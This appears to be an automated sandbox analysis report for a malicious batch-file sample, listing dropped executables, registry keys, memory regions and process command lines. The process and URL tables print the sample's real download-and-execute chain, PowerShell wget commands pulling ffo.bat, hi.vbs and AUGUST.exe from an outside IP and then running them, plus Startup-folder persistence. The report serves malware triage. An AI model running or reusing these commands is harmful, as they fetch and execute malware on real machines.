Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
55Ka50lb6Z.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\mdvbfllr
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\vqqcre
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\yigmovm
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\AUGUST.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\ffo.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\hi.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\DZIPR.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\DZIPR.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0x012569d2, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\428c6e6
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gl5lkjwh.ens.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwkfgeuh.bc0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2vsl3l5.e1s.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rmr0i1rg.obx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjs0e3py.sx3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xm113ebu.0yg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\f56bc3f4
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ffaa04af
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\wlxpec
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 13:04:04
2024, mtime=Wed Sep 25 13:04:04 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT3E06.tmp
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 13:04:04
2024, mtime=Wed Sep 25 13:04:04 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk (copy)
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 13:04:04
2024, mtime=Wed Sep 25 13:04:04 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\ekqqtq
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\ipqtwm
|
data
|
dropped
|
||
|
C:\Users\user\ekqqtq
|
data
|
dropped
|
||
|
C:\Users\user\ipqtwm
|
data
|
dropped
|
||
|
C:\Windows\Tasks\lnfast_x64.job
|
data
|
dropped
|
There are 23 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c C:\Users\user\AppData\Roaming/hi.vbs
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
|
|
|
|
C:\Users\user\AppData\Roaming\AUGUST.exe
|
C:\Users\user\AppData\Roaming/AUGUST.exe
|
|
|
|
C:\Users\user\DZIPR.exe
|
"C:\Users\user\DZIPR.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\SysWOW64\cmd.exe
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\SysWOW64\cmd.exe
|
|
|
|
C:\Windows\SysWOW64\explorer.exe
|
C:\Windows\SysWOW64\explorer.exe
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
"C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\SysWOW64\cmd.exe
|
|
|
|
C:\Windows\SysWOW64\explorer.exe
|
C:\Windows\SysWOW64\explorer.exe
|
|
|
|
C:\Windows\SysWOW64\explorer.exe
|
C:\Windows\SysWOW64\explorer.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 15 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://172.94.3.25/hi.vbs
|
172.94.3.25
|
|
|
|
http://172.94.3.25/AUGUST.exe
|
172.94.3.25
|
|
|
|
http://172.94.3.25/ffo.bat
|
172.94.3.25
|
|
|
|
fullimmersion777.com
|
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
https://www.digicert.c
|
unknown
|
||
|
http://www.vmware.com/0
|
unknown
|
||
|
https://www.datanumen.com/zip-repair/
|
unknown
|
||
|
http://www.symauth.com/rpa00
|
unknown
|
||
|
http://www.info-zip.org/
|
unknown
|
||
|
http://www.vmware.com/0/
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://c0rl.m%L
|
unknown
|
||
|
http://www.repairfile.com
|
unknown
|
||
|
http://www.symauth.com/cps0(
|
unknown
|
||
|
http://support.datanumen.com
|
unknown
|
There are 6 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.94.3.25
|
unknown
|
United States
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
4A1A000
|
trusted library allocation
|
page read and write
|
|
|
|
55C9000
|
trusted library allocation
|
page read and write
|
|
|
|
5BA0000
|
direct allocation
|
page read and write
|
|
|
|
5C40000
|
direct allocation
|
page read and write
|
|
|
|
4D6F000
|
trusted library allocation
|
page read and write
|
|
|
|
2F12000
|
unkown
|
page write copy
|
|
|
|
29A9000
|
unkown
|
page readonly
|
|
|
|
4E2E000
|
trusted library allocation
|
page read and write
|
|
|
|
3568000
|
heap
|
page read and write
|
|
|
|
55E8000
|
trusted library allocation
|
page read and write
|
|
|
|
2C59000
|
unkown
|
page readonly
|
|
|
|
4BA2000
|
trusted library allocation
|
page read and write
|
|
|
|
5420000
|
direct allocation
|
page read and write
|
|
|
|
26E6000
|
unkown
|
page read and write
|
||
|
315E000
|
unkown
|
page read and write
|
||
|
1E28AE90000
|
trusted library allocation
|
page read and write
|
||
|
4C90000
|
direct allocation
|
page read and write
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
D0DB7FE000
|
stack
|
page read and write
|
||
|
5D10000
|
heap
|
page read and write
|
||
|
10FF000
|
stack
|
page read and write
|
||
|
319E000
|
unkown
|
page read and write
|
||
|
D43000
|
heap
|
page read and write
|
||
|
2EDA000
|
unkown
|
page write copy
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
363F000
|
unkown
|
page read and write
|
||
|
3291000
|
heap
|
page read and write
|
||
|
24D96F1E000
|
heap
|
page read and write
|
||
|
6FD35000
|
unkown
|
page read and write
|
||
|
6FD35000
|
unkown
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
D0DA37E000
|
stack
|
page read and write
|
||
|
2ED0000
|
unkown
|
page read and write
|
||
|
1E286301000
|
trusted library allocation
|
page read and write
|
||
|
9D7B1FE000
|
stack
|
page read and write
|
||
|
1E28ACD0000
|
trusted library allocation
|
page read and write
|
||
|
3150000
|
unkown
|
page read and write
|
||
|
1E286CC0000
|
trusted library allocation
|
page read and write
|
||
|
D0DA47E000
|
unkown
|
page readonly
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
3664000
|
unkown
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
D0DAA7E000
|
unkown
|
page readonly
|
||
|
26E8000
|
unkown
|
page read and write
|
||
|
1E28AD40000
|
trusted library allocation
|
page read and write
|
||
|
D0DAD7E000
|
unkown
|
page readonly
|
||
|
D0DA87E000
|
unkown
|
page readonly
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
31A8000
|
heap
|
page read and write
|
||
|
5A80000
|
unkown
|
page read and write
|
||
|
2A80000
|
unkown
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
5410000
|
unkown
|
page read and write
|
||
|
32C7000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
3DFB000
|
unkown
|
page read and write
|
||
|
1E286000000
|
heap
|
page read and write
|
||
|
6C558000
|
unkown
|
page readonly
|
||
|
D0DAAFE000
|
stack
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
DA6000
|
heap
|
page read and write
|
||
|
DA6000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
57DD000
|
direct allocation
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
5A60000
|
unkown
|
page read and write
|
||
|
1E2857A0000
|
heap
|
page read and write
|
||
|
4FFE000
|
direct allocation
|
page read and write
|
||
|
3F00000
|
unkown
|
page read and write
|
||
|
19C000
|
stack
|
page read and write
|
||
|
6FD31000
|
unkown
|
page read and write
|
||
|
30FA000
|
stack
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
26E7000
|
unkown
|
page read and write
|
||
|
2EDF000
|
unkown
|
page read and write
|
||
|
363E000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
1E28582B000
|
heap
|
page read and write
|
||
|
8C8000
|
unkown
|
page write copy
|
||
|
D0DA77C000
|
stack
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
2A06000
|
heap
|
page read and write
|
||
|
3504000
|
heap
|
page read and write
|
||
|
C80000
|
heap
|
page read and write
|
||
|
290C000
|
stack
|
page read and write
|
||
|
2B3C000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
41A2000
|
unkown
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
4DE5000
|
trusted library allocation
|
page read and write
|
||
|
1E28AE80000
|
trusted library allocation
|
page read and write
|
||
|
1E28AE30000
|
trusted library allocation
|
page read and write
|
||
|
413000
|
unkown
|
page readonly
|
||
|
CC0000
|
heap
|
page read and write
|
||
|
1E28AE20000
|
trusted library allocation
|
page read and write
|
||
|
2DF0000
|
unkown
|
page readonly
|
||
|
E08000
|
heap
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
D0DBB7E000
|
stack
|
page read and write
|
||
|
D0D9EFE000
|
stack
|
page read and write
|
||
|
370B000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
4E60000
|
direct allocation
|
page read and write
|
||
|
3664000
|
unkown
|
page read and write
|
||
|
322E000
|
heap
|
page read and write
|
||
|
49D1000
|
trusted library allocation
|
page read and write
|
||
|
D0DB17E000
|
unkown
|
page readonly
|
||
|
E30000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
510E000
|
unkown
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
D04000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
273D000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
D26000
|
heap
|
page read and write
|
||
|
9D7ABDA000
|
stack
|
page read and write
|
||
|
1B0000
|
unkown
|
page readonly
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
2991000
|
heap
|
page read and write
|
||
|
D0DA07E000
|
unkown
|
page readonly
|
||
|
D04000
|
heap
|
page read and write
|
||
|
ED8000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
E42000
|
heap
|
page read and write
|
||
|
29C8000
|
unkown
|
page readonly
|
||
|
522C000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
1E28AD90000
|
trusted library allocation
|
page read and write
|
||
|
1E286100000
|
heap
|
page read and write
|
||
|
4EB1000
|
unkown
|
page read and write
|
||
|
D0DBD7B000
|
stack
|
page read and write
|
||
|
1E28B04C000
|
heap
|
page read and write
|
||
|
2AB4000
|
unkown
|
page read and write
|
||
|
2450000
|
heap
|
page read and write
|
||
|
377B000
|
heap
|
page read and write
|
||
|
6FA60000
|
unkown
|
page readonly
|
||
|
41C5000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
3660000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
8C8000
|
unkown
|
page read and write
|
||
|
FA8000
|
heap
|
page read and write
|
||
|
1E28AD51000
|
trusted library allocation
|
page read and write
|
||
|
D0DA57C000
|
stack
|
page read and write
|
||
|
D0DB1FE000
|
stack
|
page read and write
|
||
|
32A7000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
47E0000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
F02000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
47F1000
|
heap
|
page read and write
|
||
|
D0DB67B000
|
stack
|
page read and write
|
||
|
24D96BB0000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
3284000
|
heap
|
page read and write
|
||
|
2730000
|
heap
|
page read and write
|
||
|
D04000
|
heap
|
page read and write
|
||
|
3201000
|
heap
|
page read and write
|
||
|
6FD00000
|
unkown
|
page readonly
|
||
|
D0DACFE000
|
stack
|
page read and write
|
||
|
314E000
|
unkown
|
page read and write
|
||
|
3207000
|
heap
|
page read and write
|
||
|
28B8000
|
heap
|
page read and write
|
||
|
17C000
|
stack
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
3D6B000
|
unkown
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
5049000
|
direct allocation
|
page read and write
|
||
|
2AAE000
|
stack
|
page read and write
|
||
|
2CEF000
|
stack
|
page read and write
|
||
|
2F18000
|
unkown
|
page write copy
|
||
|
1E28AEA0000
|
trusted library allocation
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
E64000
|
heap
|
page read and write
|
||
|
4DBD000
|
direct allocation
|
page read and write
|
||
|
1E28AD80000
|
trusted library allocation
|
page read and write
|
||
|
41A000
|
unkown
|
page readonly
|
||
|
DA3000
|
heap
|
page read and write
|
||
|
2340000
|
heap
|
page read and write
|
||
|
41A000
|
unkown
|
page readonly
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
2C71000
|
unkown
|
page write copy
|
||
|
D0DA27E000
|
unkown
|
page readonly
|
||
|
7DE000
|
stack
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
2F19000
|
unkown
|
page read and write
|
||
|
417000
|
unkown
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
102F000
|
stack
|
page read and write
|
||
|
1E286790000
|
trusted library section
|
page readonly
|
||
|
3740000
|
heap
|
page read and write
|
||
|
DA6000
|
heap
|
page read and write
|
||
|
E64000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2F1B000
|
unkown
|
page read and write
|
||
|
E10000
|
heap
|
page read and write
|
||
|
24D96CC0000
|
heap
|
page read and write
|
||
|
374B000
|
heap
|
page read and write
|
||
|
28BA000
|
heap
|
page read and write
|
||
|
AF5000
|
heap
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
9D7AEFE000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
1E285879000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
3D58000
|
unkown
|
page read and write
|
||
|
32C1000
|
heap
|
page read and write
|
||
|
D26000
|
heap
|
page read and write
|
||
|
1E28B083000
|
heap
|
page read and write
|
||
|
4C2D000
|
direct allocation
|
page read and write
|
||
|
1E2858FD000
|
heap
|
page read and write
|
||
|
36EC000
|
heap
|
page read and write
|
||
|
E64000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
2D9B000
|
stack
|
page read and write
|
||
|
1E28B016000
|
heap
|
page read and write
|
||
|
6C531000
|
unkown
|
page execute read
|
||
|
34F6000
|
heap
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
1E28AEF0000
|
remote allocation
|
page read and write
|
||
|
2D2C000
|
stack
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
359E000
|
heap
|
page read and write
|
||
|
1E28AD50000
|
trusted library allocation
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
4012000
|
unkown
|
page read and write
|
||
|
D1E000
|
stack
|
page read and write
|
||
|
5AE000
|
stack
|
page read and write
|
||
|
1E28B095000
|
heap
|
page read and write
|
||
|
1E286750000
|
trusted library section
|
page readonly
|
||
|
8D0000
|
unkown
|
page readonly
|
||
|
2DD0000
|
unkown
|
page readonly
|
||
|
2F21000
|
unkown
|
page read and write
|
||
|
24D96DC0000
|
heap
|
page read and write
|
||
|
40A0000
|
unkown
|
page read and write
|
||
|
4D26000
|
trusted library allocation
|
page read and write
|
||
|
6C561000
|
unkown
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
EFF000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
29D2000
|
unkown
|
page write copy
|
||
|
32E1000
|
heap
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
E64000
|
heap
|
page read and write
|
||
|
3658000
|
heap
|
page read and write
|
||
|
34CC000
|
heap
|
page read and write
|
||
|
2BAF000
|
stack
|
page read and write
|
||
|
514D000
|
stack
|
page read and write
|
||
|
1E286640000
|
trusted library allocation
|
page read and write
|
||
|
432000
|
unkown
|
page readonly
|
||
|
3422000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
1E286CA1000
|
trusted library allocation
|
page read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
2FCC000
|
heap
|
page read and write
|
||
|
56D0000
|
direct allocation
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
D0D9B8B000
|
stack
|
page read and write
|
||
|
1E28AEB0000
|
trusted library allocation
|
page read and write
|
||
|
39B0000
|
trusted library allocation
|
page read and write
|
||
|
2F17000
|
unkown
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
F61000
|
heap
|
page read and write
|
||
|
4AEE000
|
heap
|
page read and write
|
||
|
3640000
|
unkown
|
page read and write
|
||
|
231A000
|
stack
|
page read and write
|
||
|
D0DADFE000
|
stack
|
page read and write
|
||
|
2BEE000
|
stack
|
page read and write
|
||
|
D9E000
|
stack
|
page read and write
|
||
|
35C1000
|
heap
|
page read and write
|
||
|
2A8C000
|
unkown
|
page read and write
|
||
|
2ECC000
|
heap
|
page read and write
|
||
|
E64000
|
heap
|
page read and write
|
||
|
40B2000
|
unkown
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
EA1000
|
heap
|
page read and write
|
||
|
E3F000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
1E285876000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
3FC0000
|
unkown
|
page read and write
|
||
|
D20000
|
heap
|
page read and write
|
||
|
32C1000
|
heap
|
page read and write
|
||
|
1E28AD70000
|
trusted library allocation
|
page read and write
|
||
|
28C0000
|
heap
|
page read and write
|
||
|
DA6000
|
heap
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
3FA0000
|
unkown
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
4671000
|
heap
|
page read and write
|
||
|
CFE000
|
stack
|
page read and write
|
||
|
D0D9FFE000
|
stack
|
page read and write
|
||
|
29C1000
|
unkown
|
page write copy
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
E33000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
D04000
|
heap
|
page read and write
|
||
|
339F000
|
heap
|
page read and write
|
||
|
1E286760000
|
trusted library section
|
page readonly
|
||
|
2930000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
353F000
|
unkown
|
page read and write
|
||
|
417000
|
unkown
|
page execute read
|
||
|
6FA61000
|
unkown
|
page execute read
|
||
|
98B000
|
unkown
|
page readonly
|
||
|
2E7D000
|
stack
|
page read and write
|
||
|
4F8D000
|
direct allocation
|
page read and write
|
||
|
1E28B08A000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
D26000
|
heap
|
page read and write
|
||
|
D0DB2FE000
|
stack
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
1E28B01D000
|
heap
|
page read and write
|
||
|
4EB1000
|
unkown
|
page read and write
|
||
|
5A61000
|
unkown
|
page read and write
|
||
|
2AB4000
|
unkown
|
page read and write
|
||
|
2E2C000
|
stack
|
page read and write
|
||
|
9D7B4FD000
|
stack
|
page read and write
|
||
|
CE0000
|
heap
|
page read and write
|
||
|
3404000
|
heap
|
page read and write
|
||
|
1E286113000
|
heap
|
page read and write
|
||
|
2A79000
|
heap
|
page read and write
|
||
|
2F8F000
|
stack
|
page read and write
|
||
|
3650000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
31B0000
|
unkown
|
page read and write
|
||
|
6FA88000
|
unkown
|
page readonly
|
||
|
1E285790000
|
heap
|
page read and write
|
||
|
1E285770000
|
heap
|
page read and write
|
||
|
5358000
|
heap
|
page read and write
|
||
|
2B16000
|
heap
|
page read and write
|
||
|
56B0000
|
direct allocation
|
page read and write
|
||
|
1E285840000
|
heap
|
page read and write
|
||
|
24D96DA0000
|
heap
|
page read and write
|
||
|
26ED000
|
heap
|
page read and write
|
||
|
3671000
|
unkown
|
page read and write
|
||
|
CE8000
|
heap
|
page read and write
|
||
|
2A8D000
|
heap
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
6FA95000
|
unkown
|
page read and write
|
||
|
D04000
|
heap
|
page read and write
|
||
|
1E28AEF0000
|
remote allocation
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
2C4E000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
495000
|
heap
|
page read and write
|
||
|
D79000
|
heap
|
page read and write
|
||
|
10EF000
|
stack
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
D04000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
11EF000
|
stack
|
page read and write
|
||
|
4105000
|
unkown
|
page read and write
|
||
|
F5D000
|
heap
|
page read and write
|
||
|
500E000
|
unkown
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
5A81000
|
unkown
|
page read and write
|
||
|
E9B000
|
heap
|
page read and write
|
||
|
8C9000
|
unkown
|
page read and write
|
||
